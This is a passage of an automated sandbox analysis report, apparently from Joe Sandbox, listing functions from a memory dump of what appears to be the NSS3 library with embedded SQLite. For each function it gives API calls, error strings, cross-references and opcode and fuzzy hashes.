Opcode ID: 635912ac664735af2679cac042626ea839f749619ade7b09fd3627c61accaa3d
Instruction ID: d6826ad55cb73ef10a85cf505731159689069b8847225bb459fc53793e7d86a8
Opcode Fuzzy Hash: 635912ac664735af2679cac042626ea839f749619ade7b09fd3627c61accaa3d
Instruction Fuzzy Hash: 5402CE71A062618FDB24CF19C4583A6BBB3EF4730CFA9825EC8915FAA1C335D916C794

Function 6C4DEFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

view, xrefs: 6C4DF061, 6C4DF071, 6C4DFAB7
sqlite_master, xrefs: 6C4DF0AB, 6C4DF2DA, 6C4DF757, 6C4DF93E
authorizer malfunction, xrefs: 6C4DF95C, 6C4DF9BF, 6C4DFA5E, 6C4DFA8B
not authorized, xrefs: 6C4DF957, 6C4DF9BA
there is already an index named %s, xrefs: 6C4DF9D7
sqlite_temp_master, xrefs: 6C4DF0A6, 6C4DF2D5
temporary table name must be unqualified, xrefs: 6C4DF734
table, xrefs: 6C4DF05C, 6C4DFABC, 6C4DFAC7
%s %T already exists, xrefs: 6C4DFAC8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 02037872d3ba5cf4c2144c2a28cd3f46d5de5e9caecca68e95b71da9f0294728
Instruction ID: e6066d7494db2b3b59e6703073ed11ecdfd302140993f6e3f82945cfb64b6968
Opcode Fuzzy Hash: 02037872d3ba5cf4c2144c2a28cd3f46d5de5e9caecca68e95b71da9f0294728
Instruction Fuzzy Hash: 1E72D270E052058FEB24DF28C4A0FA9BBF1BF49308F1681ADD8159BB52D775E846CB90

Function 6C5F9C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C4CC52B), ref: 6C5F9D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5FA035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5FA114

Strings

%s at line %d of [%.10s], xrefs: 6C5FA02E, 6C5FA10D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5FA01F, 6C5FA0E4, 6C5FA0FE
database corruption, xrefs: 6C5FA029, 6C5FA108

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: 84d68cb42a9952c7fcfde8317a36d7506be2a99a6d700207c2af1277d17703a2
Instruction ID: d9c2a8f8208baea4d29d28a615c5ae440154195863ea72d32936f2ba8f8b3074
Opcode Fuzzy Hash: 84d68cb42a9952c7fcfde8317a36d7506be2a99a6d700207c2af1277d17703a2
Instruction Fuzzy Hash: 5F229E716087418FD708CF29C89062ABBE1BFCA344F148A2DE9EA97A51D735D846CF53

Function 6C619D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C4D8637,?,?), ref: 6C619E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C4D8637), ref: 6C619ED6

Strings

%s at line %d of [%.10s], xrefs: 6C619ECF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C619EC0
database corruption, xrefs: 6C619ECA

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 0e5c6087b62c620720c84759082993031656c1c9d8b784de94e329639283b087
Instruction ID: 93373efc1d2ca7b2876a19a24878ee27218cd3de52953bb756b852ef8374c459
Opcode Fuzzy Hash: 0e5c6087b62c620720c84759082993031656c1c9d8b784de94e329639283b087
Instruction Fuzzy Hash: 6381A231B052159FCB04CF6EC980ADEB3F6AF89309B148529E915ABB41E731ED45CB98

Function 6C627F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6281BC

Strings

BINARY, xrefs: 6C628126
out of memory, xrefs: 6C62835B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: db339411b7818f80a88da9180772194e86fd8c980a55771d94f2538e179bc7eb
Instruction ID: defbcbb3600d40d1193be90f400a3f6b76bb22ce4916c306b5e28f25fe0f8adb
Opcode Fuzzy Hash: db339411b7818f80a88da9180772194e86fd8c980a55771d94f2538e179bc7eb
Instruction Fuzzy Hash: 5B52A072E05218DFDB14CF99C880B9DBBB2FF49318F24815AD815AB761D738A846CF84

Function 6C5A9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5A9ED6

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C5A9EE4

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5A9F38

Part of subcall function 6C5AD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C5A9F0B), ref: 6C5AD03B
Part of subcall function 6C5AD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C5AD04E
Part of subcall function 6C5AD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C5AD07B
Part of subcall function 6C5AD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C5AD08E
Part of subcall function 6C5AD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AD09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5A9F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C5A9F59

Part of subcall function 6C5A9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C5A9C5B), ref: 6C5A9D82
Part of subcall function 6C5A9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C5A9C5B), ref: 6C5A9DA9
Part of subcall function 6C5A9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C5A9C5B), ref: 6C5A9DCE
Part of subcall function 6C5A9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C5A9C5B), ref: 6C5A9E43

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: 42b1424aecb889aa88988c6e9bf18631bd77208130f68b4ce0d218763cd32208
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 751108B9F042119BF7019AE79C00B9F7794AFD834CF140134E91A8BB41FB62ED5A8691

Function 6C65CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65D086
PR_Malloc.NSS3(00000001), ref: 6C65D0B9
PR_Free.NSS3(?), ref: 6C65D138

Strings

>, xrefs: 6C65CF5B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 12fbe0c795734c48e730b0b3e964944c5adc54b20cc054e5e82caba1b802ff53
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 92D18E22B455460FFB24487D8DA13EA77938787378FF80325D1629BBE5E619C863C309

Function 6C4DAC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C4DAE9F
0el, xrefs: 6C4DACC0, 6C4DAD22, 6C4DAD5E, 6C4DAE45
pel, xrefs: 6C4DADA7
Pel, xrefs: 6C4DADDB, 6C4DADF5, 6C4DAE6A
winUnlock, xrefs: 6C4DAE18

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID: 0el$Pel$pel$winUnlock$winUnlockReadLock
API String ID: 0-2454714802
Opcode ID: 36b5ac9a7e05bb0f4c6872e1ce8b22cf9b4777f1e4a008a796204f04a8d64d3f
Instruction ID: 2747d8f61d3998ff30f543be094c538bb393baef70224c80ec1e80c05126633d
Opcode Fuzzy Hash: 36b5ac9a7e05bb0f4c6872e1ce8b22cf9b4777f1e4a008a796204f04a8d64d3f
Instruction Fuzzy Hash: E0719071608201AFDB04DF29E890EAABBF5FF89314F15CA18F94997301D730A985CBD5

Function 6C5FAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcac08b504206052146a966b7d31ff0e9580f2685a5bd660950b3f9a760dbe39
Instruction ID: 90c09c737e2e4e2d8e12fda30582a5c41b40b4501ab8585199f2378a421b368a
Opcode Fuzzy Hash: fcac08b504206052146a966b7d31ff0e9580f2685a5bd660950b3f9a760dbe39
Instruction Fuzzy Hash: 1DF1FF71E05212CBDB08CF6AD9847AD77B0BB8A308F154229D911DB744EB74A992CFC9

Function 6C5EDFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C4C5001,?,00000003,00000000), ref: 6C5EDFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C4C5001,?), ref: 6C5EE2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C4C5001,?), ref: 6C5EE2DA

Strings

W, xrefs: 6C5EE111

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: 008be8c7ee9381929fd0fe212fb029dea04c206da674c3e804aff83dbda8b273
Instruction ID: 064d0058c57524ebe70a5b91137a4a28c3c1092e9b8be4ce045c734b69e5b9ab
Opcode Fuzzy Hash: 008be8c7ee9381929fd0fe212fb029dea04c206da674c3e804aff83dbda8b273
Instruction Fuzzy Hash: AAC12931F142558FDB04CF658C907AA77B2BF8E308F288569DCA99BB41D7B1A901CBD1

Function 6C5B0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C5B1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C5B1086

Strings

h([l, xrefs: 6C5B0E55, 6C5B0EC4, 6C5B0F3A, 6C5B0FA7
h([l, xrefs: 6C5B1062, 6C5B105D, 6C5B0F37, 6C5B1081, 6C5B1082

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpymemset
String ID: h([l$h([l
API String ID: 1297977491-2483278849
Opcode ID: 8e1acedaa3918421d54614483936d97b63e9ea314733af31dde04004705d4737
Instruction ID: 1ab390e425ef84fc8cb647d56e08a6e7101b3ecf4e3911224a55d171ad1cd5af
Opcode Fuzzy Hash: 8e1acedaa3918421d54614483936d97b63e9ea314733af31dde04004705d4737
Instruction Fuzzy Hash: 34A13E71B0124A9FDF08CF99D9A0AEEBBB6BF89314B148129E915B7700D735EC11CB94

Function 6C4D4DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C4D5125
0el, xrefs: 6C4D4EDE, 6C4D4F82
pel, xrefs: 6C4D4E1C, 6C4D4E81, 6C4D4FDE, 6C4D5047, 6C4D50BB, 6C4D51A3, 6C4D526C
Pel, xrefs: 6C4D5019, 6C4D50FA, 6C4D5157, 6C4D51DE, 6C4D51F2, 6C4D520D, 6C4D5220, 6C4D52A2, 6C4D52B5

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID: 0el$Pel$pel$winUnlockReadLock
API String ID: 0-2227356729
Opcode ID: e86430953916b8fd800a91f8e70fdcb90dcb44dcf206f84251947bbdd14d6c8e
Instruction ID: 55b0d0cbb43f1839f880fd1c38196dc13df7d3d07fefcb247a81f1129135d9be
Opcode Fuzzy Hash: e86430953916b8fd800a91f8e70fdcb90dcb44dcf206f84251947bbdd14d6c8e
Instruction Fuzzy Hash: FDE12D70A083419FDB04EF2AD494A5ABBF0FF89304F11961DF88997351EB70A985CF86

Function 6C4D6F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6C4D702B
sz=[0-9]*, xrefs: 6C4D7049
*?[, xrefs: 6C4D7034, 6C4D7052, 6C4D7070
noskipscan*, xrefs: 6C4D7067

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: d947a51fbf375d8182c01c01e8dae55c749a9836d54a434635067446495ae2f3
Instruction ID: c75437062d34351aaa700c2397555d2d5811431db3183be8ffbf75f5532b6bc4
Opcode Fuzzy Hash: d947a51fbf375d8182c01c01e8dae55c749a9836d54a434635067446495ae2f3
Instruction Fuzzy Hash: 3B717C32F082114BDB15EE6DC8A0F9E73A29B81354F260339CD55ABBC9D671AC4787D2

Function 6C4F3EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_master, xrefs: 6C4F463F
sqlite_temp_master, xrefs: 6C4F460F
sqlite_, xrefs: 6C4F3FAA, 6C4F4185

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: 1cf34a9de32885a88045993c5dd1e594b98eb8e7dd70289ad167eb4543f84c62
Instruction ID: 5bdef27c81ce69a801271bb48396c7fc2e9cb561eff47aae33e0a21a9d041c90
Opcode Fuzzy Hash: 1cf34a9de32885a88045993c5dd1e594b98eb8e7dd70289ad167eb4543f84c62
Instruction Fuzzy Hash: A92259207491554FD701CF258260EB77BF2AFC639AB686598C9F19FB42CE26EC438750

Function 6C62BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6C62C0B6

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 6311cd5cbf46def38547ebadc625792d51c907c8c65f0eeec00bcfa245b73808
Instruction ID: 8bae6c2f8784bcf4a72678c708b1ecd47bd8e555473215cd96dfae60637233d9
Opcode Fuzzy Hash: 6311cd5cbf46def38547ebadc625792d51c907c8c65f0eeec00bcfa245b73808
Instruction Fuzzy Hash: 8A928274A042099FEB05DF54C890BAEB7B2FF88348F284158D856A7B91D73ADC46CF94

Function 6C4C3D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6C4C3EA9

Strings

0, xrefs: 6C4C3DAB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
